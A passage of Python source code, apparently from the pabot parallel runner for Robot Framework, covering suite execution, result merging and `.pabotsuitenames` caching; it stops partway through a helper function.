is_last = _NUMBER_OF_ITEMS_TO_BE_EXECUTED == 1
_NUMBER_OF_ITEMS_TO_BE_EXECUTED -= 1
if CTRL_C_PRESSED:
# Keyboard interrupt has happened!
return
time.sleep(0)
try:
datasources = [
d.encode("utf-8") if PY2 and is_unicode(d) else d for d in item.datasources
]
caller_id = uuid.uuid4().hex
name = item.display_name
outs_dir = os.path.join(item.outs_dir, item.argfile_index, str(item.index))
os.makedirs(outs_dir)
cmd = _create_command_for_execution(
caller_id, datasources, is_last, item, outs_dir
)
if item.hive:
_hived_execute(
item.hive,
cmd,
outs_dir,
name,
item.verbose,
_make_id(),
caller_id,
item.index,
)
else:
_try_execute_and_wait(
cmd,
outs_dir,
name,
item.verbose,
_make_id(),
caller_id,
item.index,
item.execution_item.type != "test",
)
outputxml_preprocessing(
item.options, outs_dir, name, item.verbose, _make_id(), caller_id
)
except:
_write(traceback.format_exc())
def _create_command_for_execution(caller_id, datasources, is_last, item, outs_dir):
cmd = (
item.command
+ _options_for_custom_executor(
item.options,
outs_dir,
item.execution_item,
item.argfile,
caller_id,
is_last,
item.index,
item.last_level,
item.processes,
)
+ datasources
)
return _mapOptionalQuote(cmd)
def _pabotlib_in_use():
return _PABOTLIBPROCESS or _PABOTLIBURI != "127.0.0.1:8270"
def _hived_execute(
hive, cmd, outs_dir, item_name, verbose, pool_id, caller_id, my_index=-1
):
plib = None
if _pabotlib_in_use():
plib = Remote(_PABOTLIBURI)
try:
make_order(hive, " ".join(cmd), outs_dir)
except:
_write(traceback.format_exc())
if plib:
_increase_completed(plib, my_index)
def _try_execute_and_wait(
cmd,
outs_dir,
item_name,
verbose,
pool_id,
caller_id,
my_index=-1,
show_stdout_on_failure=False,
):
# type: (List[str], str, str, bool, int, str, int, bool) -> None
plib = None
is_ignored = False
if _pabotlib_in_use():
plib = Remote(_PABOTLIBURI)
try:
with open(os.path.join(outs_dir, cmd[0] + "_stdout.out"), "w") as stdout:
with open(os.path.join(outs_dir, cmd[0] + "_stderr.out"), "w") as stderr:
process, (rc, elapsed) = _run(
cmd, stderr, stdout, item_name, verbose, pool_id, my_index
)
except:
_write(traceback.format_exc())
if plib:
_increase_completed(plib, my_index)
is_ignored = _is_ignored(plib, caller_id)
if is_ignored and os.path.isdir(outs_dir):
shutil.rmtree(outs_dir)
# Thread-safe list append
_ALL_ELAPSED.append(elapsed)
_result_to_stdout(
elapsed,
is_ignored,
item_name,
my_index,
pool_id,
process,
rc,
stderr,
stdout,
verbose,
show_stdout_on_failure,
)
def _result_to_stdout(
elapsed,
is_ignored,
item_name,
my_index,
pool_id,
process,
rc,
stderr,
stdout,
verbose,
show_stdout_on_failure,
):
if is_ignored:
_write_with_id(
process,
pool_id,
my_index,
_execution_ignored_message(item_name, stdout, stderr, elapsed, verbose),
)
elif rc != 0:
_write_with_id(
process,
pool_id,
my_index,
_execution_failed_message(
item_name, stdout, stderr, rc, verbose or show_stdout_on_failure
),
Color.RED,
)
else:
_write_with_id(
process,
pool_id,
my_index,
_execution_passed_message(item_name, stdout, stderr, elapsed, verbose),
Color.GREEN,
)
def _is_ignored(plib, caller_id): # type: (Remote, str) -> bool
return plib.run_keyword("is_ignored_execution", [caller_id], {})
# optionally invoke rebot for output.xml preprocessing to get --RemoveKeywords
# and --flattenkeywords applied => result: much smaller output.xml files + faster merging + avoid MemoryErrors
def outputxml_preprocessing(options, outs_dir, item_name, verbose, pool_id, caller_id):
# type: (Dict[str, Any], str, str, bool, int, str) -> None
try:
remove_keywords = options["removekeywords"]
flatten_keywords = options["flattenkeywords"]
if not remove_keywords and not flatten_keywords:
# => no preprocessing needed if no removekeywords or flattenkeywords present
return
remove_keywords_args = [] # type: List[str]
flatten_keywords_args = [] # type: List[str]
for k in remove_keywords:
remove_keywords_args += ["--removekeywords", k]
for k in flatten_keywords:
flatten_keywords_args += ["--flattenkeywords", k]
outputxmlfile = os.path.join(outs_dir, "output.xml")
oldsize = os.path.getsize(outputxmlfile)
cmd = (
[
"rebot",
"--log",
"NONE",
"--report",
"NONE",
"--xunit",
"NONE",
"--consolecolors",
"off",
"--NoStatusRC",
]
+ remove_keywords_args
+ flatten_keywords_args
+ ["--output", outputxmlfile, outputxmlfile]
)
cmd = _mapOptionalQuote(cmd)
_try_execute_and_wait(
cmd,
outs_dir,
"preprocessing output.xml on " + item_name,
verbose,
pool_id,
caller_id,
)
newsize = os.path.getsize(outputxmlfile)
perc = 100 * newsize / oldsize
if verbose:
_write(
"%s [main] [%s] Filesize reduced from %s to %s (%0.2f%%) for file %s"
% (
datetime.datetime.now(),
pool_id,
oldsize,
newsize,
perc,
outputxmlfile,
)
)
except:
print(sys.exc_info())
def _write_with_id(process, pool_id, item_index, message, color=None, timestamp=None):
timestamp = timestamp or datetime.datetime.now()
_write(
"%s [PID:%s] [%s] [ID:%s] %s"
% (timestamp, process.pid, pool_id, item_index, message),
color,
)
def _make_id(): # type: () -> int
global EXECUTION_POOL_IDS, EXECUTION_POOL_ID_LOCK
thread_id = threading.current_thread().ident
assert thread_id is not None
with EXECUTION_POOL_ID_LOCK:
if thread_id not in EXECUTION_POOL_IDS:
EXECUTION_POOL_IDS += [thread_id]
return EXECUTION_POOL_IDS.index(thread_id)
def _increase_completed(plib, my_index):
# type: (Remote, int) -> None
global _COMPLETED_LOCK, _NOT_COMPLETED_INDEXES
with _COMPLETED_LOCK:
if my_index not in _NOT_COMPLETED_INDEXES:
return
_NOT_COMPLETED_INDEXES.remove(my_index)
if _NOT_COMPLETED_INDEXES:
plib.run_keyword(
"set_parallel_value_for_key",
[
pabotlib.PABOT_MIN_QUEUE_INDEX_EXECUTING_PARALLEL_VALUE,
_NOT_COMPLETED_INDEXES[0],
],
{},
)
if len(_NOT_COMPLETED_INDEXES) == 1:
plib.run_keyword(
"set_parallel_value_for_key", ["pabot_only_last_executing", 1], {}
)
def _run(command, stderr, stdout, item_name, verbose, pool_id, item_index):
# type: (List[str], IO[Any], IO[Any], str, bool, int, int) -> Tuple[Union[subprocess.Popen[bytes], subprocess.Popen], Tuple[int, float]]
timestamp = datetime.datetime.now()
cmd = " ".join(command)
if PY2:
cmd = cmd.decode("utf-8").encode(SYSTEM_ENCODING)
# avoid hitting https://bugs.python.org/issue10394
with POPEN_LOCK:
process = subprocess.Popen(cmd, shell=True, stderr=stderr, stdout=stdout)
if verbose:
_write_with_id(
process,
pool_id,
item_index,
"EXECUTING PARALLEL %s with command:\n%s" % (item_name, cmd),
timestamp=timestamp,
)
else:
_write_with_id(
process,
pool_id,
item_index,
"EXECUTING %s" % item_name,
timestamp=timestamp,
)
return process, _wait_for_return_code(process, item_name, pool_id, item_index)
def _wait_for_return_code(process, item_name, pool_id, item_index):
rc = None
elapsed = 0
ping_time = ping_interval = 150
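    # elapsed counts 0.1 s polls, so the first "still running" note appears after ~15 s
    # and the gap between subsequent notes grows by 5 s each time (ping_interval += 50 ticks)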
while rc is None:
rc = process.poll()
time.sleep(0.1)
elapsed += 1
if elapsed == ping_time:
ping_interval += 50
ping_time += ping_interval
_write_with_id(
process,
pool_id,
item_index,
"still running %s after %s seconds" % (item_name, elapsed / 10.0),
)
return rc, elapsed / 10.0
def _read_file(file_handle):
try:
with open(file_handle.name, "r") as content_file:
content = content_file.read()
return content
except:
return "Unable to read file %s" % file_handle
def _execution_failed_message(suite_name, stdout, stderr, rc, verbose):
if not verbose:
return "FAILED %s" % suite_name
return "Execution failed in %s with %d failing test(s)\n%s\n%s" % (
suite_name,
rc,
_read_file(stdout),
_read_file(stderr),
)
def _execution_passed_message(suite_name, stdout, stderr, elapsed, verbose):
if not verbose:
return "PASSED %s in %s seconds" % (suite_name, elapsed)
return "PASSED %s in %s seconds\n%s\n%s" % (
suite_name,
elapsed,
_read_file(stdout),
_read_file(stderr),
)
def _execution_ignored_message(suite_name, stdout, stderr, elapsed, verbose):
if not verbose:
return "IGNORED %s" % suite_name
return "IGNORED %s in %s seconds\n%s\n%s" % (
suite_name,
elapsed,
_read_file(stdout),
_read_file(stderr),
)
def _options_for_custom_executor(*args):
# type: (Any) -> List[str]
return _options_to_cli_arguments(_options_for_executor(*args))
def _options_for_executor(
options,
outs_dir,
execution_item,
argfile,
caller_id,
is_last,
queueIndex,
last_level,
processes,
):
options = options.copy()
options["log"] = "NONE"
options["report"] = "NONE"
options["xunit"] = "NONE"
options["test"] = options.get("test", [])[:]
options["suite"] = options.get("suite", [])[:]
execution_item.modify_options_for_executor(options)
options["outputdir"] = "%OUTPUTDIR%" if execution_item.type == "hived" else outs_dir
options["variable"] = options.get("variable", [])[:]
options["variable"].append("CALLER_ID:%s" % caller_id)
pabotLibURIVar = "PABOTLIBURI:%s" % _PABOTLIBURI
# Prevent multiple appending of PABOTLIBURI variable setting
if pabotLibURIVar not in options["variable"]:
options["variable"].append(pabotLibURIVar)
pabotExecutionPoolId = "PABOTEXECUTIONPOOLID:%d" % _make_id()
if pabotExecutionPoolId not in options["variable"]:
options["variable"].append(pabotExecutionPoolId)
pabotIsLast = "PABOTISLASTEXECUTIONINPOOL:%s" % ("1" if is_last else "0")
if pabotIsLast not in options["variable"]:
options["variable"].append(pabotIsLast)
pabotProcesses = "PABOTNUMBEROFPROCESSES:%s" % str(processes)
if pabotProcesses not in options["variable"]:
options["variable"].append(pabotProcesses)
pabotIndex = pabotlib.PABOT_QUEUE_INDEX + ":" + str(queueIndex)
if pabotIndex not in options["variable"]:
options["variable"].append(pabotIndex)
if last_level is not None:
pabotLastLevel = pabotlib.PABOT_LAST_LEVEL + ":" + str(last_level)
if pabotLastLevel not in options["variable"]:
options["variable"].append(pabotLastLevel)
if argfile:
_modify_options_for_argfile_use(argfile, options, execution_item.top_name())
options["argumentfile"] = argfile
return _set_terminal_coloring_options(options)
def _modify_options_for_argfile_use(argfile, options, root_name):
argfile_opts, _ = ArgumentParser(
USAGE,
auto_pythonpath=False,
auto_argumentfile=True,
env_options="ROBOT_OPTIONS",
).parse_args(["--argumentfile", argfile])
old_name = options.get("name", root_name)
if argfile_opts["name"]:
new_name = argfile_opts["name"]
_replace_base_name(new_name, old_name, options, "suite")
if not options["suite"]:
_replace_base_name(new_name, old_name, options, "test")
if "name" in options:
del options["name"]
def _replace_base_name(new_name, old_name, options, key):
if isinstance(options.get(key, None), str):
options[key] = new_name + options[key][len(old_name) :]
elif key in options:
options[key] = [new_name + s[len(old_name) :] for s in options.get(key, [])]
def _set_terminal_coloring_options(options):
if ROBOT_VERSION >= "2.9":
options["consolecolors"] = "off"
options["consolemarkers"] = "off"
else:
options["monitorcolors"] = "off"
if ROBOT_VERSION >= "2.8" and ROBOT_VERSION < "2.9":
options["monitormarkers"] = "off"
return options
def _options_to_cli_arguments(opts): # type: (dict) -> List[str]
res = [] # type: List[str]
for k, v in opts.items():
if isinstance(v, str):
res += ["--" + str(k), str(v)]
elif PY2 and is_unicode(v):
res += ["--" + str(k), v.encode("utf-8")]
elif isinstance(v, bool) and (v is True):
res += ["--" + str(k)]
elif isinstance(v, list):
for value in v:
if PY2 and is_unicode(value):
res += ["--" + str(k), value.encode("utf-8")]
else:
res += ["--" + str(k), str(value)]
return res
def _group_by_groups(tokens):
result = []
group = None
for token in tokens:
if isinstance(token, GroupStartItem):
if group is not None:
raise DataError(
"Ordering: Group can not contain a group. Encoutered '{'"
)
group = GroupItem()
result.append(group)
continue
if isinstance(token, GroupEndItem):
if group is None:
raise DataError(
"Ordering: Group end tag '}' encountered before start '{'"
)
group = None
continue
if group is not None:
group.add(token)
else:
result.append(token)
return result
def hash_directory(digest, path):
if os.path.isfile(path):
digest.update(_digest(_norm_path(path)))
get_hash_of_file(path, digest)
return
for root, _, files in os.walk(path):
for name in sorted(files):
file_path = os.path.join(root, name)
if os.path.isfile(file_path) and any(
file_path.endswith(p) for p in _ROBOT_EXTENSIONS
):
# DO NOT ALLOW CHANGE TO FILE LOCATION
digest.update(_digest(_norm_path(root)))
# DO THESE IN TWO PHASES BECAUSE SEPARATOR DIFFERS IN DIFFERENT OS
digest.update(_digest(name))
get_hash_of_file(file_path, digest)
def _norm_path(path):
return "/".join(os.path.normpath(path).split(os.path.sep))
def _digest(text):
text = text.decode("utf-8") if PY2 and not is_unicode(text) else text
return hashlib.sha1(text.encode("utf-8")).digest()
def get_hash_of_file(filename, digest):
if not os.path.isfile(filename):
return
with open(filename, "rb") as f_obj:
while True:
buf = f_obj.read(1024 * 1024)
if not buf:
break
digest.update(buf)
def get_hash_of_dirs(directories):
digest = hashlib.sha1()
for directory in directories:
hash_directory(digest, directory)
return digest.hexdigest()
IGNORED_OPTIONS = [
"pythonpath",
"outputdir",
"output",
"log",
"report",
"removekeywords",
"flattenkeywords",
"tagstatinclude",
"tagstatexclude",
"tagstatcombine",
"critical",
"noncritical",
"tagstatlink",
"metadata",
"tagdoc",
]
def get_hash_of_command(options, pabot_args):
digest = hashlib.sha1()
hopts = dict(options)
for option in options:
if option in IGNORED_OPTIONS or options[option] == []:
del hopts[option]
if pabot_args.get("testlevelsplit"):
hopts["testlevelsplit"] = True
digest.update(repr(sorted(hopts.items())).encode("utf-8"))
return digest.hexdigest()
Hashes = namedtuple("Hashes", ["dirs", "cmd", "suitesfrom"])
def _suitesfrom_hash(pabot_args):
if "suitesfrom" in pabot_args:
digest = hashlib.sha1()
get_hash_of_file(pabot_args["suitesfrom"], digest)
return digest.hexdigest()
else:
return "no-suites-from-option"
if PY2:
def _open_pabotsuitenames(mode):
return open(".pabotsuitenames", mode)
else:
def _open_pabotsuitenames(mode):
return open(".pabotsuitenames", mode, encoding="utf-8")
def solve_suite_names(outs_dir, datasources, options, pabot_args):
h = Hashes(
dirs=get_hash_of_dirs(datasources),
cmd=get_hash_of_command(options, pabot_args),
suitesfrom=_suitesfrom_hash(pabot_args),
)
try:
if not os.path.isfile(".pabotsuitenames"):
suite_names = generate_suite_names(
outs_dir, datasources, options, pabot_args
)
store_suite_names(h, suite_names)
return suite_names
with _open_pabotsuitenames("r") as suitenamesfile:
lines = [line.strip() for line in suitenamesfile.readlines()]
corrupted = len(lines) < 5
file_h = None # type: Optional[Hashes]
file_hash = None # type: Optional[str]
hash_of_file = None # type: Optional[str]
if not corrupted:
file_h = Hashes(
dirs=lines[0][len("datasources:") :],
cmd=lines[1][len("commandlineoptions:") :],
suitesfrom=lines[2][len("suitesfrom:") :],
)
file_hash = lines[3][len("file:") :]
hash_of_file = _file_hash(lines)
corrupted = corrupted or any(
not l.startswith("--suite ")
and not l.startswith("--test ")
and l != "#WAIT"
and l != "{"
and l != "}"
for l in lines[4:]
)
execution_item_lines = [parse_execution_item_line(l) for l in lines[4:]]
if corrupted or h != file_h or file_hash != hash_of_file:
return _regenerate(
file_h,
h,
pabot_args,
outs_dir,
datasources,
options,
execution_item_lines,
)
return execution_item_lines
except IOError:
return _levelsplit(
generate_suite_names_with_builder(outs_dir, datasources, options),
pabot_args,
)
def _levelsplit(
suites, pabot_args
): # type: (List[SuiteItem], Dict[str, str]) -> List[ExecutionItem]
if pabot_args.get("testlevelsplit"):
tests = [] # type: List[ExecutionItem]
for s in suites:
tests.extend(s.tests)
return tests
return list(suites)
def _group_by_wait(lines):
suites = [[]] # type: List[List[ExecutionItem]]
for suite in lines:
if not suite.isWait:
if suite:
suites[-1].append(suite)
else:
suites.append([])
return suites
def _regenerate(
file_h, h, pabot_args, outs_dir, datasources, options, lines
): # type: (Optional[Hashes], Hashes, Dict[str, str], str, List[str], Dict[str, str], List[ExecutionItem]) -> List[ExecutionItem]
assert all(isinstance(s, ExecutionItem) for s in lines)
if (
(file_h is None or file_h.suitesfrom != h.suitesfrom)
and "suitesfrom" in pabot_args
and os.path.isfile(pabot_args["suitesfrom"])
):
suites = _suites_from_outputxml(pabot_args["suitesfrom"])
if file_h is None or file_h.dirs != h.dirs:
all_suites = generate_suite_names_with_builder(
outs_dir, datasources, options
)
else:
all_suites = [suite for suite in lines if suite]
suites = _preserve_order(all_suites, suites)
else:
suites = _levelsplit(
generate_suite_names_with_builder(outs_dir, datasources, options),
pabot_args,
)
suites = _preserve_order(suites, [suite for suite in lines if suite])
if suites:
store_suite_names(h, suites)
assert all(isinstance(s, ExecutionItem) for s in suites)
return suites
def _contains_suite_and_test(suites):
return any(isinstance(s, SuiteItem) for s in suites) and any(
isinstance(t, TestItem) for t in suites
)
def _preserve_order(new_items, old_items):
assert all(isinstance(s, ExecutionItem) for s in new_items)
assert all(isinstance(s, ExecutionItem) for s in old_items)
old_contains_tests = any(isinstance(t, TestItem) for t in old_items)
old_contains_suites = any(isinstance(s, SuiteItem) for s in old_items)
old_items = _fix_items(old_items)
new_contains_tests = any(isinstance(t, TestItem) for t in new_items)
if old_contains_tests and old_contains_suites and not new_contains_tests:
new_items = _split_partially_to_tests(new_items, old_items)
# TODO: Preserving order when suites => tests OR tests => suites
preserve, ignorable = _get_preserve_and_ignore(
new_items, old_items, old_contains_tests and old_contains_suites
)
exists_in_old_and_new = [
s for s in old_items if (s in new_items and s not in ignorable) or s in preserve
]
exists_only_in_new = [
s for s in new_items if s not in old_items and s not in ignorable
]
return _fix_items(exists_in_old_and_new + exists_only_in_new)
def _fix_items(items): # type: (List[ExecutionItem]) -> List[ExecutionItem]
assert all(isinstance(s, ExecutionItem) for s in items)
to_be_removed = [] # type: List[int]
for i in range(len(items)):
for j in range(i + 1, len(items)):
if items[i].contains(items[j]):
to_be_removed.append(j)
items = [item for i, item in enumerate(items) if i not in to_be_removed]
result = [] # type: List[ExecutionItem]
to_be_splitted = {} # type: Dict[int, List[ExecutionItem]]
for i in range(len(items)):
if i in to_be_splitted:
result.extend(items[i].difference(to_be_splitted[i]))
else:
result.append(items[i])
for j in range(i + 1, len(items)):
if items[j].contains(items[i]):
if j not in to_be_splitted:
to_be_splitted[j] = []
to_be_splitted[j].append(items[i])
_remove_double_waits(result)
_remove_empty_groups(result)
if result and result[0].isWait:
result = result[1:]
if result and result[-1].isWait:
result = result[:-1]
return result
def _get_preserve_and_ignore(new_items, old_items, old_contains_suites_and_tests):
ignorable = []
preserve = []
for old_item in old_items:
for new_item in new_items:
if (
old_item.contains(new_item)
and new_item != old_item
and (isinstance(new_item, SuiteItem) or old_contains_suites_and_tests)
):
preserve.append(old_item)
ignorable.append(new_item)
if (
old_item.isWait
or isinstance(old_item, GroupStartItem)
or isinstance(old_item, GroupEndItem)
):
preserve.append(old_item)
preserve = [
new_item
for new_item in preserve
if not any([i.contains(new_item) and i != new_item for i in preserve])
]
return preserve, ignorable
def _remove_double_waits(exists_in_old_and_new): # type: (List[ExecutionItem]) -> None
doubles = []
for i, (j, k) in enumerate(zip(exists_in_old_and_new, exists_in_old_and_new[1:])):
if j.isWait and k == j:
doubles.append(i)
for i in reversed(doubles):
del exists_in_old_and_new[i]
def _remove_empty_groups(exists_in_old_and_new): # type: (List[ExecutionItem]) -> None
removables = []
for i, (j, k) in enumerate(zip(exists_in_old_and_new, exists_in_old_and_new[1:])):
if isinstance(j, GroupStartItem) and isinstance(k, GroupEndItem):
removables.extend([i, i + 1])
for i in reversed(removables):
del exists_in_old_and_new[i]
def _split_partially_to_tests(
new_suites, old_suites
): # type: (List[SuiteItem], List[ExecutionItem]) -> List[ExecutionItem]
suits = [] # type: List[ExecutionItem]
for s in new_suites:
split = False
for old_test in old_suites:
if isinstance(old_test, TestItem) and s.contains(old_test):
split = True
if split:
suits.extend(s.tests)
else:
suits.append(s)
return suits
def _file_hash(lines):
digest = hashlib.sha1()
digest.update(lines[0].encode())
digest.update(lines[1].encode())
digest.update(lines[2].encode())
hashes = 0
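    # XOR-ing the per-line digests makes this part of the hash independent of line order,
    # while the three header lines above are hashed in their fixed positions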
for line in lines[4:]:
if line not in ("#WAIT", "{", "}"):
line = line.decode("utf-8") if PY2 else line
hashes ^= int(hashlib.sha1(line.encode("utf-8")).hexdigest(), 16)
digest.update(str(hashes).encode())
return digest.hexdigest()
def store_suite_names(hashes, suite_names):
# type: (Hashes, List[ExecutionItem]) -> None
assert all(isinstance(s, ExecutionItem) for s in suite_names)
suite_lines = [s.line() for s in suite_names]
_write("Storing .pabotsuitenames file")
try:
with _open_pabotsuitenames("w") as suitenamesfile:
suitenamesfile.write("datasources:" + hashes.dirs + "\n")
suitenamesfile.write("commandlineoptions:" + hashes.cmd + "\n")
suitenamesfile.write("suitesfrom:" + hashes.suitesfrom + "\n")
suitenamesfile.write(
"file:"
+ _file_hash(
[
"datasources:" + hashes.dirs,
"commandlineoptions:" + hashes.cmd,
"suitesfrom:" + hashes.suitesfrom,
None,
]
+ suite_lines
)
+ "\n"
)
suitenamesfile.writelines(
(d + "\n").encode("utf-8") if PY2 and is_unicode(d) else d + "\n"
for d in suite_lines
)
except IOError:
_write(
"[ "
+ _wrap_with(Color.YELLOW, "WARNING")
+ " ]: storing .pabotsuitenames failed"
)
def generate_suite_names(
outs_dir, datasources, options, pabot_args
): # type: (object, object, object, Dict[str, str]) -> List[ExecutionItem]
suites = [] # type: List[SuiteItem]
if "suitesfrom" in pabot_args and os.path.isfile(pabot_args["suitesfrom"]):
suites = _suites_from_outputxml(pabot_args["suitesfrom"])
else:
suites = generate_suite_names_with_builder(outs_dir, datasources, options)
if pabot_args.get("testlevelsplit"):
tests = [] # type: List[ExecutionItem]
for s in suites:
tests.extend(s.tests)
return tests
return list(suites)
def generate_suite_names_with_builder(outs_dir, datasources, options):
opts = _options_for_dryrun(options, outs_dir)
settings = RobotSettings(opts)
builder = TestSuiteBuilder(
settings["SuiteNames"], settings.extension, rpa=settings.rpa
)
suite = builder.build(*datasources)
settings.rpa = builder.rpa
suite.configure(**settings.suite_config)
if settings.pre_run_modifiers:
_write.error = _write
suite.visit(
ModelModifier(settings.pre_run_modifiers, settings.run_empty_suite, _write)
)
all_suites = (
get_all_suites_from_main_suite(suite.suites) if suite.suites else [suite]
)
suite_names = [
SuiteItem(
suite.longname,
tests=[test.longname for test in suite.tests],
suites=suite.suites,
)
for suite in all_suites
]
if not suite_names and not options.get("runemptysuite", False):
stdout_value = opts["stdout"].getvalue()
if stdout_value:
_write(
"[STDOUT] from suite search:\n" + stdout_value + "[STDOUT] end",
Color.YELLOW,
)
stderr_value = opts["stderr"].getvalue()
if stderr_value:
_write(
"[STDERR] from suite search:\n" + stderr_value + "[STDERR] end",
Color.RED,
)
return list(sorted(set(suite_names)))
def get_all_suites_from_main_suite(suites):
all_suites = []
for suite in suites:
if suite.suites:
all_suites.extend(get_all_suites_from_main_suite(suite.suites))
else:
all_suites.append(suite)
return all_suites
class SuiteNotPassingsAndTimes(ResultVisitor):
def __init__(self):
self.suites = [] # type: List[Tuple[bool, int, str]]
def start_suite(self, suite):
if len(suite.tests) > 0:
self.suites.append((not suite.passed, suite.elapsedtime, suite.longname))
def _suites_from_outputxml(outputxml):
res = ExecutionResult(outputxml)
suite_times = SuiteNotPassingsAndTimes()
res.visit(suite_times)
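    # Order suites so that failing and longest-running suites come first
    # (sorted descending by (not passed, elapsed time)), letting the slowest
    # work start early when executed in parallel.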
return [SuiteItem(suite) for (_, _, suite) in reversed(sorted(suite_times.suites))]
def _options_for_dryrun(options, outs_dir):
options = options.copy()
options["log"] = "NONE"
options["report"] = "NONE"
options["xunit"] = "NONE"
options["variable"] = options.get("variable", [])[:]
options["variable"].append(pabotlib.PABOT_QUEUE_INDEX + ":-1")
if ROBOT_VERSION >= "2.8":
options["dryrun"] = True
else:
options["runmode"] = "DryRun"
options["output"] = "suite_names.xml"
# --timestampoutputs is not compatible with hard-coded suite_names.xml
options["timestampoutputs"] = False
options["outputdir"] = outs_dir
if PY2:
options["stdout"] = BytesIO()
options["stderr"] = BytesIO()
else:
options["stdout"] = StringIO()
options["stderr"] = StringIO()
options["listener"] = []
return _set_terminal_coloring_options(options)
def _options_for_rebot(options, start_time_string, end_time_string):
rebot_options = options.copy()
rebot_options["starttime"] = start_time_string
rebot_options["endtime"] = end_time_string
rebot_options["monitorcolors"] = "off"
rebot_options["suite"] = []
rebot_options["test"] = []
rebot_options["exclude"] = []
rebot_options["include"] = []
if ROBOT_VERSION >= "2.8":
options["monitormarkers"] = "off"
return rebot_options
def _now():
return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")
def _print_elapsed(start, end):
_write(
"Total testing: "
+ _time_string(sum(_ALL_ELAPSED))
+ "\nElapsed time: "
+ _time_string(end - start)
)
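# Formats an elapsed time given in seconds, e.g. _time_string(3725.5) returns
# "1 hour 2 minutes 5.50 seconds".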
def _time_string(elapsed):
millis = int((elapsed * 100) % 100)
seconds = int(elapsed) % 60
elapsed_minutes = (int(elapsed) - seconds) / 60
minutes = elapsed_minutes % 60
elapsed_hours = (elapsed_minutes - minutes) / 60
elapsed_string = ""
if elapsed_hours > 0:
plural = ""
if elapsed_hours > 1:
plural = "s"
elapsed_string += ("%d hour" % elapsed_hours) + plural + " "
if minutes > 0:
plural = ""
if minutes > 1:
plural = "s"
elapsed_string += ("%d minute" % minutes) + plural + " "
return elapsed_string + "%d.%d seconds" % (seconds, millis)
def keyboard_interrupt(*args):
global CTRL_C_PRESSED
CTRL_C_PRESSED = True
def _parallel_execute(items, processes):
original_signal_handler = signal.signal(signal.SIGINT, keyboard_interrupt)
pool = ThreadPool(processes)
result = pool.map_async(execute_and_wait_with, items, 1)
pool.close()
while not result.ready():
        # the keyboard interrupt is handled in the main thread and needs this
        # polling loop to get a chance to run
try:
time.sleep(0.1)
except IOError:
keyboard_interrupt()
signal.signal(signal.SIGINT, original_signal_handler)
def _output_dir(options, cleanup=True):
outputdir = options.get("outputdir", ".")
outpath = os.path.join(outputdir, "pabot_results")
if cleanup and os.path.isdir(outpath):
shutil.rmtree(outpath)
return outpath
def _copy_output_artifacts(options, file_extensions=None, include_subfolders=False):
file_extensions = file_extensions or ["png"]
pabot_outputdir = _output_dir(options, cleanup=False)
outputdir = options.get("outputdir", ".")
copied_artifacts = []
for location, _, file_names in os.walk(pabot_outputdir):
for file_name in file_names:
file_ext = file_name.split(".")[-1]
if file_ext in file_extensions:
rel_path = os.path.relpath(location, pabot_outputdir)
prefix = rel_path.split(os.sep)[0] # folders named "process-id"
dst_folder_path = outputdir
# if it is a file from sub-folders of "location"
if os.sep in rel_path:
if not include_subfolders:
continue
# create destination sub-folder
subfolder_path = rel_path[rel_path.index(os.sep) + 1 :]
dst_folder_path = os.path.join(outputdir, subfolder_path)
if not os.path.isdir(dst_folder_path):
os.makedirs(dst_folder_path)
dst_file_name = "-".join([prefix, file_name])
shutil.copyfile(
os.path.join(location, file_name),
os.path.join(dst_folder_path, dst_file_name),
)
copied_artifacts.append(file_name)
return copied_artifacts
def _report_results(outs_dir, pabot_args, options, start_time_string, tests_root_name):
stats = {
"critical": {"total": 0, "passed": 0, "failed": 0},
"all": {"total": 0, "passed": 0, "failed": 0},
}
if pabot_args["argumentfiles"]:
outputs = [] # type: List[str]
for index, _ in pabot_args["argumentfiles"]:
copied_artifacts = _copy_output_artifacts(
options, pabot_args["artifacts"], pabot_args["artifactsinsubfolders"]
)
outputs += [
_merge_one_run(
os.path.join(outs_dir, index),
options,
tests_root_name,
stats,
copied_artifacts,
outputfile=os.path.join("pabot_results", "output%s.xml" % index),
)
]
if "output" not in options:
options["output"] = "output.xml"
_write_stats(stats)
return rebot(*outputs, **_options_for_rebot(options, start_time_string, _now()))
else:
return _report_results_for_one_run(
outs_dir, pabot_args, options, start_time_string, tests_root_name, stats
)
def _write_stats(stats):
crit = stats["critical"]
al = stats["all"]
_write(
"%d critical tests, %d passed, %d failed"
% (crit["total"], crit["passed"], crit["failed"])
)
_write(
"%d tests total, %d passed, %d failed"
% (al["total"], al["passed"], al["failed"])
)
_write("===================================================")
def _report_results_for_one_run(
outs_dir, pabot_args, options, start_time_string, tests_root_name, stats
):
copied_artifacts = _copy_output_artifacts(
options, pabot_args["artifacts"], pabot_args["artifactsinsubfolders"]
)
output_path = _merge_one_run(
outs_dir, options, tests_root_name, stats, copied_artifacts
)
_write_stats(stats)
if (
"report" in options
and options["report"] == "NONE"
and "log" in options
and options["log"] == "NONE"
):
options[
"output"
] = output_path # REBOT will return error 252 if nothing is written
else:
_write("Output: %s" % output_path)
options["output"] = None # Do not write output again with rebot
return rebot(output_path, **_options_for_rebot(options, start_time_string, _now()))
def _merge_one_run(
outs_dir, options, tests_root_name, stats, copied_artifacts, outputfile=None
):
outputfile = outputfile or options.get("output", "output.xml")
output_path = os.path.abspath(
os.path.join(options.get("outputdir", "."), outputfile)
)
files = sorted(glob(os.path.join(_glob_escape(outs_dir), "**/*.xml")))
if not files:
_write('WARN: No output files in "%s"' % outs_dir, Color.YELLOW)
return ""
def invalid_xml_callback():
global _ABNORMAL_EXIT_HAPPENED
_ABNORMAL_EXIT_HAPPENED = True
if PY2:
files = [f.decode(SYSTEM_ENCODING) if not is_unicode(f) else f for f in files]
resu = merge(
files, options, tests_root_name, copied_artifacts, invalid_xml_callback
)
_update_stats(resu, stats)
resu.save(output_path)
return output_path
def _update_stats(result, stats):
s = result.statistics
stats["critical"]["total"] += s.total.critical.total
stats["critical"]["passed"] += s.total.critical.passed
stats["critical"]["failed"] += s.total.critical.failed
stats["all"]["total"] += s.total.all.total
stats["all"]["passed"] += s.total.all.passed
stats["all"]["failed"] += s.total.all.failed
# This is from https://github.com/django/django/blob/master/django/utils/glob.py
_magic_check = re.compile("([*?[])")
def _glob_escape(pathname):
"""
Escape all special characters.
"""
drive, pathname = os.path.splitdrive(pathname)
pathname = _magic_check.sub(r"[\1]", pathname)
return drive + pathname
def _writer():
while True:
message = MESSAGE_QUEUE.get()
if message is None:
MESSAGE_QUEUE.task_done()
return
print(message)
sys.stdout.flush()
MESSAGE_QUEUE.task_done()
def _write(message, color=None):
MESSAGE_QUEUE.put(_wrap_with(color, message))
def _wrap_with(color, message):
